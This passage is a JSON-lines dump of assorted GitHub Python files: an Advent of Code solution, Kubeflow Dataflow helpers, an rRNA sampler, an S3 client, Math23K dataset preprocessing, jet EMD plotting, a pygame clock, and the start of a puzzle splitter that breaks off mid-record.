+{"seq_id":"15521239692","text":"from collections import deque\n\ncache = deque() # allows for delay\nreg = 1\nclock = -1\ninteresting = [20, 60, 100, 140, 180, 220]\nint_val = []\nscreen = [[] for _ in range(6)]\nwith open(\"input\", \"r\") as file:\n\t# for line in iter(file.readline, ''):\n\twhile clock < 239:\n\t\tclock += 1\n\t\tif (clock % 40) <= reg+1 and (clock % 40) >= reg-1:\n\t\t\tscreen[clock // 40].append('#')\n\t\telse:\n\t\t\tscreen[clock // 40].append('.')\n\t\tif cache: # if cache has stuff\n\t\t\treg += cache.popleft()\n\t\telse:\n\t\t\tcmd = file.readline().rstrip().split()\n\t\t\t# if cmd[0] == 'noop': # don't do anything, let clock tick\n\t\t\tif cmd[0] == 'addx':\n\t\t\t\tcache.append(int(cmd[1]))\n\nfor line in screen:\n\tprint(''.join(line))\n","repo_name":"probablyanasian/advent-of-code","sub_path":"2022/10/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71969307069","text":"import logging\nimport time\nimport json\nimport os\nimport tempfile\n\nfrom kfp_component.core import display\nfrom .. import common as gcp_common\nfrom ..storage import download_blob, parse_blob_path, is_gcs_path\n\n_JOB_SUCCESSFUL_STATES = ['JOB_STATE_DONE', 'JOB_STATE_UPDATED', 'JOB_STATE_DRAINED']\n_JOB_FAILED_STATES = ['JOB_STATE_STOPPED', 'JOB_STATE_FAILED', 'JOB_STATE_CANCELLED']\n_JOB_TERMINATED_STATES = _JOB_SUCCESSFUL_STATES + _JOB_FAILED_STATES\n\ndef wait_for_job_done(df_client, project_id, job_id, location=None, wait_interval=30):\n while True:\n job = df_client.get_job(project_id, job_id, location=location)\n state = job.get('currentState', None)\n if is_job_done(state):\n return job\n elif is_job_terminated(state):\n # Terminated with error state\n raise RuntimeError('Job {} failed with error state: {}.'.format(\n job_id,\n state\n ))\n else:\n logging.info('Job {} is in pending state {}.'\n ' Waiting for {} seconds for next poll.'.format(\n job_id,\n state,\n wait_interval\n ))\n time.sleep(wait_interval)\n\ndef wait_and_dump_job(df_client, project_id, location, job, \n wait_interval):\n display_job_link(project_id, job)\n job_id = job.get('id')\n job = wait_for_job_done(df_client, project_id, job_id, \n location, wait_interval)\n dump_job(job)\n return job\n\ndef is_job_terminated(job_state):\n return job_state in _JOB_TERMINATED_STATES\n\ndef is_job_done(job_state):\n return job_state in _JOB_SUCCESSFUL_STATES\n\ndef display_job_link(project_id, job):\n location = job.get('location')\n job_id = job.get('id')\n display.display(display.Link(\n href = 'https://console.cloud.google.com/dataflow/'\n 'jobsDetail/locations/{}/jobs/{}?project={}'.format(\n location, job_id, project_id),\n text = 'Job Details'\n ))\n\ndef dump_job(job):\n gcp_common.dump_file('/tmp/kfp/output/dataflow/job.json', json.dumps(job))\n gcp_common.dump_file('/tmp/kfp/output/dataflow/job_id.txt', job.get('id'))\n\ndef stage_file(local_or_gcs_path):\n if not is_gcs_path(local_or_gcs_path):\n return local_or_gcs_path\n _, blob_path = parse_blob_path(local_or_gcs_path)\n file_name = os.path.basename(blob_path)\n local_file_path = os.path.join(tempfile.mkdtemp(), file_name)\n download_blob(local_or_gcs_path, local_file_path)\n return local_file_path\n\ndef get_staging_location(staging_dir, context_id):\n if not staging_dir:\n return None\n\n staging_location = os.path.join(staging_dir, context_id)\n logging.info('staging_location: {}'.format(staging_location))\n return staging_location\n\ndef read_job_id_and_location(storage_client, staging_location):\n if staging_location:\n job_blob = _get_job_blob(storage_client, staging_location)\n if job_blob.exists():\n job_data = job_blob.download_as_string().decode().split(',')\n # Returns (job_id, location)\n logging.info('Found existing job {}.'.format(job_data))\n return (job_data[0], job_data[1])\n\n return (None, None)\n\ndef upload_job_id_and_location(storage_client, staging_location, job_id, location):\n if not staging_location:\n return\n if not location:\n location = ''\n data = '{},{}'.format(job_id, location)\n job_blob = _get_job_blob(storage_client, staging_location)\n logging.info('Uploading {} to {}.'.format(data, job_blob))\n job_blob.upload_from_string(data)\n\ndef _get_job_blob(storage_client, staging_location):\n bucket_name, staging_blob_name = parse_blob_path(staging_location)\n job_blob_name = os.path.join(staging_blob_name, 'kfp/dataflow/launch_python/job.txt')\n bucket = storage_client.bucket(bucket_name)\n return bucket.blob(job_blob_name)","repo_name":"kubeflow/kfp-tekton-backend","sub_path":"components/gcp/container/component_sdk/python/kfp_component/google/dataflow/_common_ops.py","file_name":"_common_ops.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"73769959226","text":"import math\nimport random\n\nmature_rRNA_classes = [\"5.8s\", \"18s\", \"28s\", \"5s\"]\npremature_rRNA_classes = [\"45s pre-ribosomal RNA\"]\nrRNA_classes = mature_rRNA_classes + premature_rRNA_classes\n\nclass RibosomalRNA:\n '''\n Load rRNA data and allow creation of rRNA samples.\n '''\n def __init__(self, logfile, parameters):\n self.fasta = self.read_fasta(parameters[\"rRNA_fasta_file\"])\n\n for rRNA in rRNA_classes:\n assert rRNA in self.fasta, f\"rRNA FASTA file {parameters['rRNA_fasta_file']} must contain a '{rRNA}' entry\"\n\n\n # The percentage of the rRNA that is mature (versus just the pre-ribosomal RNA\n self.percent_mature = parameters[\"percent_mature\"]\n\n def generate_rRNA_sample(self, num_molecules):\n ''' returns a sample of size `num_molcules` of sequences of\n un-degraded rRNA molecules '''\n\n num_mature = math.floor(self.percent_mature * num_molecules)\n num_premature = num_molecules - num_mature\n\n sample = []\n for i in range(num_mature):\n rRNA_class = mature_rRNA_classes[random.randrange(len(mature_rRNA_classes))]\n sample.append( self.fasta[rRNA_class] )\n\n for j in range(num_premature):\n rRNA_class = premature_rRNA_classes[random.randrange(len(premature_rRNA_classes))]\n sample.append( self.fasta[rRNA_class] )\n\n return sample\n\n def read_fasta(self, filename):\n ''' load a fasta file as a dictionary of description:sequence pairs '''\n fasta_file = open(filename, \"r\")\n\n entries = {}\n current_entry_description = None\n current_entry = None\n for line in fasta_file:\n if line.startswith(\">\"):\n if current_entry is not None:\n entries[current_entry_description] = ''.join(current_entry)\n\n current_entry_description = line[1:-1] #remove '>' and newline\n current_entry = []\n else:\n if current_entry is None:\n raise Exception(\"FASTA file has no description line\")\n \n current_entry.append(line[:-1]) #remove newline\n\n if current_entry is not None:\n entries[current_entry_description] = ''.join(current_entry)\n\n return entries\n\nif __name__ == '__main__':\n rRNA = RibosomalRNA(logfile = None,\n parameters = dict(percent_mature = 0.9,\n rRNA_fasta_file = \"../../data/mm9/rRNA.fa\"))\n\n rRNA_sample = rRNA.generate_rRNA_sample(100)\n print(f\"Generated {len(rRNA_sample)} rRNA molecules\")\n print(f\"The first ten are: {rRNA_sample[:10]}\")\n","repo_name":"itmat/CAMPAREE","sub_path":"camparee/rRNA.py","file_name":"rRNA.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"28575691332","text":"import boto3\nfrom decouple import config\n\nclass S3Client:\n def __init__(self):\n self.s3 = boto3.resource('s3', aws_access_key_id=config('S3_ACCESS_KEY_ID'), aws_secret_access_key=config('S3_ACCESS_SECRET_KEY'))\n self.s3_bucket = self.s3.Bucket(config('S3_BUCKET_NAME'))\n self.s3_client = boto3.client('s3')\n self.bucket_name = config('S3_BUCKET_NAME')\n \n \n def upload(self, file, filename, folder=\"raw\"):\n self.s3_bucket.put_object(\n Key=f\"{folder}/{filename}\",\n Body=file\n )\n \n def getAllFilenames(self, folder=\"raw\"):\n audio_files = []\n folder_filter = f\"{folder}/\"\n for audio in self.s3_bucket.objects.filter(Prefix=folder_filter):\n audio_files.append(audio.key)\n \n return audio_files[1:]\n \n def retrieveAudioFiles(self, folder=\"raw\"):\n audio_files = self.getAllFilenames(folder) \n raw_files = []\n\n for file in audio_files:\n obj = self.s3.Object(self.bucket_name, file)\n content = obj.get()['Body'].read() \n \n raw_files.append((file, content)) \n \n return raw_files\n \n def getContents(self, key):\n fileObject = self.s3.Object(self.bucket_name, key)\n \n return fileObject.get()['Body']\n \n \n \n \n \n ","repo_name":"jdang4/AudioConverter","sub_path":"S3Client.py","file_name":"S3Client.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15412254230","text":"import json\nimport numpy as np\nimport random\nimport math\nimport re\nimport sys\nimport torch\nfrom torchtext import data, datasets\n\nsys.path.append('../../sni/model')\nimport model\nimport evalTest\n\ndef main():\n\n # LOAD DATA\n jsondata = json.loads(open('./Math23K.json').read())\n\n # LOAD SNI MODEL\n model = torch.load('../../sni/models/sni_best_model.pt')\n if int(torch.cuda.is_available()) == 1:\n model = model.cuda()\n print(model)\n\n #if model.model.gru.flatten_parameters()\n model.lstm.flatten_parameters()\n model.eval()\n TEXT = data.Field(lower=True,init_token=\"\",eos_token=\"\")\n LABEL = data.Field(sequential=False)\n\n fields = [('text', TEXT), ('label', LABEL)]\n train = data.TabularDataset(path='../../sni/data/train.tsv', format='tsv', fields=fields)\n TEXT.build_vocab(train)\n LABEL.build_vocab(train)\n train_classifier = data.TabularDataset(path='./train.tsv', format='tsv', fields=fields)\n LABEL.build_vocab(train)\n #print(LABEL.vocab.itos)\n\n\n\n # PREPROCESS DATA\n print('Preprocessing...')\n for d in jsondata:\n #print(d['segmented_text'])\n #print(d['equation'])\n d['segmented_text'], d['equation'] = preprocess(d['segmented_text'], d['equation'], model, fields)\n print('Preprocessing Complete...')\n\n with open('./Math23K-preprocessed.json', 'w') as outfile:\n json.dump(jsondata, outfile)\n #jsondata = json.loads(open('./Math23K-preprocessed.json').read())\n\n # 5 FOLD CROSS VALIDATION\n print('Using existing cross validation splits')\n #print('Preforming cross validation splits...')\n #crossValidation(jsondata, k = 5, k_test=5)\n\n # SAVE SPLIT INDICES\n split('./Math23K-train.txt', './Math23K-dev.txt', './Math23K-test.txt', k_test=5)\n\n # SAVE SRC/TGT files\n train_indices = np.genfromtxt('./Math23K-train.txt').astype(int)\n dev_indices = np.genfromtxt('./Math23K-dev.txt').astype(int)\n test_indices = np.genfromtxt('./Math23K-test.txt').astype(int)\n json2txt(train_indices, jsondata, './src-train.txt', './tgt-train.txt')\n json2txt(dev_indices, jsondata, './src-val.txt', './tgt-val.txt')\n json2txt(test_indices, jsondata, './src-test.txt', './tgt-test.txt')\n\n # REMOVE TEST FOLD BEFORE COUNTING UNCOMMON EQUATIONS\n jsondata = [d for d in jsondata if int(d['id']) not in test_indices]\n\n # REMOVE UNCOMMON EQUATIONS\n print('Removing uncommon equations...')\n print('Started with', len(jsondata), 'examples')\n common_data2, uncommon_data2 = mostCommon(jsondata, .2)\n common_data4, uncommon_data4 = mostCommon(jsondata, .4)\n common_data6, uncommon_data6 = mostCommon(jsondata, .6)\n common_data8, uncommon_data8 = mostCommon(jsondata, .8)\n #print('Filtered down to', len(common_data), 'examples')\n\n # SAVE SRC/TGT FILES (FILTERED DATA)\n train_dev_indices = np.append(train_indices, dev_indices)\n json2txt(train_dev_indices, common_data2, './src-train_dev_0.2_common.txt', './tgt-train_dev_0.2_common.txt')\n json2txt(train_dev_indices, uncommon_data2, './src-train_dev_0.2_uncommon.txt', './tgt-train_dev_0.2_uncommon.txt')\n\n json2txt(train_dev_indices, common_data4, './src-train_dev_0.4_common.txt', './tgt-train_dev_0.4_common.txt')\n json2txt(train_dev_indices, uncommon_data4, './src-train_dev_0.4_uncommon.txt', './tgt-train_dev_0.4_uncommon.txt')\n\n json2txt(train_dev_indices, common_data6, './src-train_dev_0.6_common.txt', './tgt-train_dev_0.6_common.txt')\n json2txt(train_dev_indices, uncommon_data6, './src-train_dev_0.6_uncommon.txt', './tgt-train_dev_0.6_uncommon.txt')\n\n json2txt(train_dev_indices, common_data8, './src-train_dev_0.8_common.txt', './tgt-train_dev_0.8_common.txt')\n json2txt(train_dev_indices, uncommon_data8, './src-train_dev_0.8_uncommon.txt', './tgt-train_dev_0.8_uncommon.txt')\n\n # SAVE TSV FILES\n txt2tsv('./src-train.txt', './tgt-train.txt', './train.tsv')\n txt2tsv('./src-val.txt', './tgt-val.txt', './val.tsv')\n txt2tsv('./src-test.txt', './tgt-test.txt', './test.tsv')\n txt2tsv('./src-train_dev_0.2_common.txt', './tgt-train_dev_0.2_common.txt', './train_dev_0.2_common.tsv')\n txt2tsv('./src-train_dev_0.2_uncommon.txt', './tgt-train_dev_0.2_uncommon.txt', './train_dev_0.2_uncommon.tsv')\n txt2tsv('./src-train_dev_0.4_common.txt', './tgt-train_dev_0.4_common.txt', './train_dev_0.4_common.tsv')\n txt2tsv('./src-train_dev_0.4_uncommon.txt', './tgt-train_dev_0.4_uncommon.txt', './train_dev_0.4_uncommon.tsv')\n txt2tsv('./src-train_dev_0.6_common.txt', './tgt-train_dev_0.6_common.txt', './train_dev_0.6_common.tsv')\n txt2tsv('./src-train_dev_0.6_uncommon.txt', './tgt-train_dev_0.6_uncommon.txt', './train_dev_0.6_uncommon.tsv')\n txt2tsv('./src-train_dev_0.8_common.txt', './tgt-train_dev_0.8_common.txt', './train_dev_0.8_common.tsv')\n txt2tsv('./src-train_dev_0.8_uncommon.txt', './tgt-train_dev_0.8_uncommon.txt', './train_dev_0.8_uncommon.tsv')\n\n # SAVE FULL TSV FILES\n tsvs2tsv('./train_dev_0.2_common.tsv', './train_dev_0.2_uncommon.tsv', './train_dev_0.2.tsv')\n tsvs2tsv('./train_dev_0.4_common.tsv', './train_dev_0.4_uncommon.tsv', './train_dev_0.4.tsv')\n tsvs2tsv('./train_dev_0.6_common.tsv', './train_dev_0.6_uncommon.tsv', './train_dev_0.6.tsv')\n tsvs2tsv('./train_dev_0.8_common.tsv', './train_dev_0.8_uncommon.tsv', './train_dev_0.8.tsv')\n\n # SAVE FULL TXT FILES FOR SEQ2SEQ\n tsvs2txt('./train_dev_0.2_common.tsv', './train_dev_0.2_uncommon.tsv', './src-train_dev_0.2.txt', './tgt-train_dev_0.2.txt')\n tsvs2txt('./train_dev_0.4_common.tsv', './train_dev_0.4_uncommon.tsv', './src-train_dev_0.4.txt', './tgt-train_dev_0.4.txt')\n tsvs2txt('./train_dev_0.6_common.tsv', './train_dev_0.6_uncommon.tsv', './src-train_dev_0.6.txt', './tgt-train_dev_0.6.txt')\n tsvs2txt('./train_dev_0.8_common.tsv', './train_dev_0.8_uncommon.tsv', './src-train_dev_0.8.txt', './tgt-train_dev_0.8.txt')\n\n # SPLIT TRAIN DEV FOR CLASSIFIER\n splitTrainDev('./train_dev_0.2.tsv', './train_0.2.tsv', './dev_0.2.tsv')\n splitTrainDev('./train_dev_0.4.tsv', './train_0.4.tsv', './dev_0.4.tsv')\n splitTrainDev('./train_dev_0.6.tsv', './train_0.6.tsv', './dev_0.6.tsv')\n splitTrainDev('./train_dev_0.8.tsv', './train_0.8.tsv', './dev_0.8.tsv')\n\n # SPLIT TRAIN DEV FOR SEQ2SEQ\n splitTrainDev('./src-train_dev_0.2.txt', './src-train_0.2.txt', './src-dev_0.2.txt')\n splitTrainDev('./tgt-train_dev_0.2.txt', './tgt-train_0.2.txt', './tgt-dev_0.2.txt')\n splitTrainDev('./src-train_dev_0.4.txt', './src-train_0.4.txt', './src-dev_0.4.txt')\n splitTrainDev('./tgt-train_dev_0.4.txt', './tgt-train_0.4.txt', './tgt-dev_0.4.txt')\n splitTrainDev('./src-train_dev_0.6.txt', './src-train_0.6.txt', './src-dev_0.6.txt')\n splitTrainDev('./tgt-train_dev_0.6.txt', './tgt-train_0.6.txt', './tgt-dev_0.6.txt')\n splitTrainDev('./src-train_dev_0.8.txt', './src-train_0.8.txt', './src-dev_0.8.txt')\n splitTrainDev('./tgt-train_dev_0.8.txt', './tgt-train_0.8.txt', './tgt-dev_0.8.txt')\n\ndef crossValidation(data, k = 5, k_test=5):\n # Saves k folds\n # k: k fold cross validation\n # k_test: fold to use for test\n\n random.shuffle(data)\n fold_size = math.floor(np.shape(data)[0] / k)\n for i in range(1, k + 1):\n output = open('fold' + str(i) + '.txt', 'w')\n for d in data[(i-1) * fold_size: i * fold_size]:\n output.write(d['id'] + '\\n')\n output.close()\n print('fold' + str(i) + '.txt' + ' saved')\n\ndef split(train_path, dev_path, test_path, k_test=5):\n train_dev = []\n for i in range(1,6):\n if not i == k_test:\n train_dev = np.append(train_dev, open('fold' + str(i) + '.txt').readlines())\n #random.shuffle(train_dev)\n test = open('fold' + str(k_test) + '.txt').readlines()\n\n # Train\n output = open(train_path, 'w')\n for d in train_dev[0:-1000]:\n output.write(d)\n output.close()\n print(train_path + ' saved')\n\n # Dev\n output = open(dev_path, 'w')\n for d in train_dev[-1000:]:\n output.write(d)\n output.close()\n print(dev_path + ' saved')\n\n # Test\n output = open(test_path, 'w')\n for d in test:\n output.write(d)\n output.close()\n print(test_path + ' saved')\n\ndef mostCommon(data, percent):\n # returns PERCENT of data by # of equation occurences\n\n equation, count= np.unique([d['equation'] for d in data], return_counts=True)\n indices = np.asarray((equation, count)).T[:,1].astype(int).argsort()\n result = np.asarray([[equation[i], count[i]] for i in indices])\n removed = np.array([])\n\n total_eqs = np.sum(np.asarray(result[:,1]).astype(int))\n occurences = 1\n while len(removed) < total_eqs * (1 - percent):\n print('Removing equations with', occurences, 'occurences...')\n equations_to_remove = result[:,0][np.asarray(result[:,1]).astype(int) == occurences]\n for eq in equations_to_remove:\n eq = eq.strip()\n removed = np.append(removed, [d for d in data if d['equation'].strip() == eq])\n data = [d for d in data if not d['equation'].strip() == eq]\n\n print('total # equations removed:', len(removed))\n occurences += 1\n return data, removed\n\ndef tsvs2tsv(common_path, uncommon_path, output_path):\n \"\"\"\n takes tsv for both common and uncommon data\n writes a combined tsv with uncommon tgt replaced with 'seq'\n \"\"\"\n common = open(common_path).readlines()\n uncommon = open(uncommon_path).readlines()\n output = open(output_path, 'w')\n for d in uncommon:\n result = d.split('\\t')\n result[1] = 'seq\\n'\n output.write('\\t'.join(result))\n for d in common:\n output.write(d)\n output.close()\n\ndef tsvs2txt(common_path, uncommon_path, output_path_src, output_path_tgt):\n \"\"\"\n takes tsv for both common and uncommon data\n writes combined txts with uncommon tgt replaced with 'seq'\n \"\"\"\n common = open(common_path).readlines()\n uncommon = open(uncommon_path).readlines()\n output_src = open(output_path_src, 'w')\n output_tgt = open(output_path_tgt, 'w')\n for d in uncommon:\n result = d.split('\\t')\n result[0] = result[0].strip() + '\\n'\n result[1] = 'seq\\n'\n output_src.write(result[0])\n output_tgt.write(result[1])\n for d in common:\n result = d.split('\\t')\n result[0] = result[0].strip() + '\\n'\n result[1] = result[1].strip() + '\\n'\n output_src.write(result[0])\n output_tgt.write(result[1])\n output_src.close()\n output_tgt.close()\n\ndef splitTrainDev(train_dev_path, output_train_path, output_dev_path):\n train_dev = open(train_dev_path).readlines()\n random.shuffle(train_dev)\n output_train = open(output_train_path, 'w')\n output_dev = open(output_dev_path, 'w')\n for d in train_dev[:1000]:\n output_dev.write(d)\n for d in train_dev[1000:]:\n output_train.write(d)\n output_train.close()\n output_dev.close()\n\ndef preprocess(question, equation, model, fields):\n #handle fractions and % and numbers with units\n question = question.replace('%', ' % ')\n\n fractions = re.findall('\\(\\d+\\)/\\(\\d+\\)', question)\n fractions = np.append(fractions, re.findall('\\(\\d+/\\d+\\)', question))\n for i,fraction in enumerate(fractions):\n question = question.replace(fraction, str(sys.maxsize - i))\n equation = equation.replace(fraction, str(sys.maxsize - i))\n\n equation = equation.replace('+', ' + ')\n equation = equation.replace('-', ' - ')\n equation = equation.replace('*', ' * ')\n equation = equation.replace('/', ' / ')\n equation = equation.replace('(', ' ( ')\n equation = equation.replace(')', ' ) ')\n equation = equation.replace('=', ' = ')\n equation = equation.replace('^', ' ^ ')\n equation = equation.replace('%', ' / 100 ')\n equation = equation.split()\n\n question = re.sub(r'(\\d+)([A-z]{1,2})', r'\\1 \\2', question)\n\n # Preprocess Question\n\n question = question.split()\n\n i = 0\n\n question = ['null', 'null', 'null'] + question + ['null', 'null', 'null']\n question_copy = [t for t in question]\n\n for j,token in enumerate(question):\n if isFloat(token):\n example = question_copy[j-3:j+4]\n ex = data.Example.fromlist([' '.join(example), ''], fields)\n dataset = data.Dataset([ex], fields)\n inp = None\n iterator = data.Iterator(dataset, batch_size=1)\n iterator.repeat=False\n for batch in iterator:\n inp = batch.text.t()\n if isSignificant(inp, model):\n for symbol in equation:\n if symbol == token:\n equation[equation.index(symbol)] = '[' + chr(97 + i) + ']'\n for q in question:\n if q == token:\n question[question.index(q)] = '[' + chr(97 + i) + ']'\n i += 1\n\n question = question[3:-3]\n\n question = ' '.join(question) + '\\n'\n equation = ' '.join(equation) + '\\n'\n #print(question)\n #print(equation)\n return question, equation\n\ndef json2txt(json_indices, data, output_path_src, output_path_tgt):\n output_src = open(output_path_src, 'w')\n output_tgt = open(output_path_tgt, 'w')\n for d in data:\n if int(d['id']) in json_indices:\n question, equation = d['segmented_text'], d['equation'] #No preprocessing needed here\n output_src.write(question)\n output_tgt.write(equation)\n output_src.close()\n output_tgt.close()\n\ndef isFloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\ndef isSignificant(inp, model):\n #print('inp:', inp)\n #print('evalTest.fast_test(inp, model).data[0]', evalTest.fast_test(inp, model).data[0])\n return(evalTest.fast_test(inp, model).data[0] == 1)\n\ndef txt2tsv(src_path, tgt_path, tsv_path):\n src_txt = open(src_path).readlines()\n tgt_txt = open(tgt_path).readlines()\n tsv = open(tsv_path, 'w')\n for i in range(len(src_txt)):\n tsv.write(src_txt[i].strip() + '\\t' + tgt_txt[i].strip() +'\\n')\n\nif __name__ == '__main__':\n main()\n","repo_name":"rikkarikka/nn_math_solver","sub_path":"tencent/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":14177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12814330238","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport itertools\nimport energyflow as ef\nfrom get_jets import get_jets_from_training_data\n\nplt.rcParams['figure.figsize'] = (4,4)\nplt.rcParams['figure.dpi'] = 120\nplt.rcParams['font.family'] = 'serif'\n\n\ndef get_data_from_file():\n NUMBER_OF_EVENTS = 10\n\n signal_events, background_events, events_combined = get_jets_from_training_data(NUMBER_OF_EVENTS)\n\n events_data = []\n for i in range(np.shape(events_combined)[1]):\n # Take only signal events\n event_column = events_combined[i]\n if int(event_column[2100]) == 0:#1:\n event_data = []\n for j in range(700):\n if event_column[j * 3] > 0:\n pt = event_column[j * 3]\n eta = event_column[j * 3 + 1]\n phi = event_column[j * 3 + 2]\n\n event_data += [[pt, eta, phi]]\n events_data += [event_data]\n return events_data\n\n\ndef get_data_from_web():\n # load quark and gluon jets\n X, y = ef.qg_jets.load(2000, pad=False)\n\n num = 750\n\n # the jet radius for these jets\n R = 0.4\n\n # process jets\n Gs, Qs = [], []\n for arr, events in [(Gs, X[y == 0]), (Qs, X[y == 1])]:\n for i, x in enumerate(events):\n if i >= num:\n break\n\n # ignore padded particles and removed particle id information\n x = x[x[:, 0] > 0, :3]\n\n # center jet according to pt-centroid\n yphi_avg = np.average(x[:, 1:3], weights=x[:, 0], axis=0)\n x[:, 1:3] -= yphi_avg\n\n # mask out any particles farther than R=0.4 away from center (rare)\n x = x[np.linalg.norm(x[:, 1:3], axis=1) <= R]\n\n # add to list\n arr.append(x)\n return Gs,Qs\n # choose interesting events\n # ev0, ev1 = Gs[0], Gs[15]\n\n\ndef plot_emd(ev0, ev1):\n # calculate the EMD and the optimal transport flow\n R = 0.4\n emdval, G = ef.emd.emd(ev0, ev1, R=R, return_flow=True)\n if not (10 < emdval < 5000):\n return\n\n print('Made It Here!')\n # plot the two events\n colors = ['red', 'blue']\n labels = ['Gluon Jet 1', 'Gluon Jet 2']\n for i, ev in enumerate([ev0, ev1]):\n pts, ys, phis = ev[:, 0], ev[:, 1], ev[:, 2]\n plt.scatter(ys, phis, marker='o', s=2 * pts, color=colors[i], lw=0, zorder=10, label=labels[i])\n\n # plot the flow\n mx = G.max()\n xs, xt = ev0[:, 1:3], ev1[:, 1:3]\n for i in range(xs.shape[0]):\n for j in range(xt.shape[0]):\n if G[i, j] > 0:\n plt.plot([xs[i, 0], xt[j, 0]], [xs[i, 1], xt[j, 1]],\n alpha=G[i, j] / mx, lw=1.25, color='black')\n\n # plot settings\n #plt.xlim(-R, R)\n #plt.ylim(-R, R)\n plt.xlabel('Rapidity')\n plt.ylabel('Azimuthal Angle')\n # plt.xticks(np.linspace(-R, R, 5))\n # plt.yticks(np.linspace(-R, R, 5))\n\n plt.text(0.6, 0.03, 'EMD: {:.1f} GeV'.format(emdval), fontsize=10, transform=plt.gca().transAxes)\n plt.legend(loc=(0.1, 1.0), frameon=False, ncol=2, handletextpad=0)\n\n plt.show()\n \"\"\"\n # compute pairwise EMDs between all jets (takes about 3 minutes, can change n_jobs if you have more cores)\n g_emds = ef.emd.emds(Gs, R=R, norm=True, verbose=1, n_jobs=1, print_every=25000)\n q_emds = ef.emd.emds(Qs, R=R, norm=True, verbose=1, n_jobs=1, print_every=25000)\n\n # prepare for histograms\n bins = 10**np.linspace(-2, 0, 60)\n reg = 10**-30\n midbins = (bins[:-1] + bins[1:])/2\n dmidbins = np.log(midbins[1:]) - np.log(midbins[:-1]) + reg\n midbins2 = (midbins[:-1] + midbins[1:])/2\n\n # compute the correlation dimensions\n dims = []\n for emd_vals in [q_emds, g_emds]:\n uemds = np.triu(emd_vals)\n counts = np.cumsum(np.histogram(uemds[uemds > 0], bins=bins)[0])\n dims.append((np.log(counts[1:] + reg) - np.log(counts[:-1] + reg))/dmidbins)\n\n # plot the correlation dimensions\n plt.plot(midbins2, dims[0], '-', color='blue', label='Quarks')\n plt.plot(midbins2, dims[1], '-', color='red', label='Gluons')\n\n # labels\n plt.legend(loc='center right', frameon=False)\n\n # plot style\n plt.xscale('log')\n plt.xlabel('Energy Scale Q/pT'); plt.ylabel('Correlation Dimension')\n plt.xlim(0.02, 1); plt.ylim(0, 5)\n\n plt.show()\n \"\"\"\n\n\nevents_dat = get_data_from_file()\nprint('Found %d signal events' % len(events_dat))\nfor pair in itertools.product(events_dat, repeat=2):\n (ev0, ev1) = pair\n plot_emd(np.array(ev0), np.array(ev1))\n","repo_name":"rotemov/ML4Jets-HUJI","sub_path":"emdemo.py","file_name":"emdemo.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"9297986517","text":"import pygame\nimport datetime\nimport math \n\npygame.init()\n\nW, H = 800, 800\nx = W//2\ny = H//2\n\nWHITE = (255, 255, 255)\n\nsc = pygame.display.set_mode((W, H))\nsc.fill(WHITE)\n\nmickey = pygame.image.load(\"mickey_clock.png\")\nleftHand = pygame.image.load(\"left_hand.png\")\nrightHand = pygame.image.load(\"right_hand.png\")\nminute_hand_length = 140\nhand_thickness = 10\nmickeyRect = mickey.get_rect()\n\n\ndef deg_to_rad(deg):\n return deg * math.pi / 180.0\n\ndef blitRotateCenter(surf, image, center, angle):\n rotated_image = pygame.transform.rotate(image, angle)\n new_rect = rotated_image.get_rect(center = image.get_rect(center = center).center)\n surf.blit(rotated_image, new_rect)\n\ndef rotate_point(point, pivot, angle):\n \n x = point[0] - pivot[0]\n y = point[1] - pivot[1]\n\n x_new = x * math.cos(angle) - y * math.sin(angle)\n y_new = x * math.sin(angle) + y * math.cos(angle)\n\n x_new += pivot[0]\n y_new += pivot[1]\n\n return int(x_new), int(y_new)\n \nlangle = 0\nrangle = 0\n\n\nwhile True:\n \n sc.fill((WHITE))\n \n current_time = datetime.datetime.now()\n \n langle = current_time.second*6 - 90\n rangle = (current_time.minute*6) - 90\n \n sc.blit(mickey, (x, y))\n sc.blit(mickey, mickeyRect)\n \n blitRotateCenter(sc, leftHand, (x,y), -langle)\n # minute_hand_end = rotate_point((x, y - minute_hand_length), mickeyRect, -rangle)\n blitRotateCenter(sc, rightHand, (x,y), -rangle)\n # pygame.draw.line(sc, (255, 0, 0), (x,y), minute_hand_end, hand_thickness)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n\n pygame.display.update()","repo_name":"DayFay1/KBTU","sub_path":"TSISVII/сщзнцфвфцв.py","file_name":"сщзнцфвфцв.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17032780281","text":"import glob\nimport json\nimport re\nimport logging\n\nfrom layout.empty_layout_registry import EmptyLayoutRegistry\nfrom schema.bitmap_image import BitmapImage\nfrom schema.layout_offset_lookup_function import LayoutOffsetLookupFn\nfrom schema.layout_summary import LayoutSummary\nfrom schema.piece import Piece\nfrom schema.place import Place\nfrom schema.sprite import Sprite\nfrom schema.sprite_offset import SpriteOffset\n\n\nclass PreComputedLookupSplitter:\n def __init__(self, dir_name, place_ids,\n layout_registry=EmptyLayoutRegistry(),\n has_background=False):\n self.has_background = has_background\n self.dir_name = dir_name\n self.place_ids = place_ids\n self.layout_registry = layout_registry\n\n logging.info(\"loaded {} ids from {}\".format(len(self.place_ids),\n dir_name))\n\n @classmethod\n def from_dir(cls, dir_name, layout_registry, has_background=False):\n place_ids = list(cls.place_ids_in_dir(dir_name))\n return PreComputedLookupSplitter(dir_name=dir_name,\n place_ids=place_ids,\n layout_registry=layout_registry,\n has_background=has_background)\n\n @classmethod\n def save_to_dir(cls, place, dir_name):\n collapsed = [\n {\n \"id\": cls.index_from_global_id(piece.id),\n \"x\": piece.bitmap_image.x,\n \"y\": 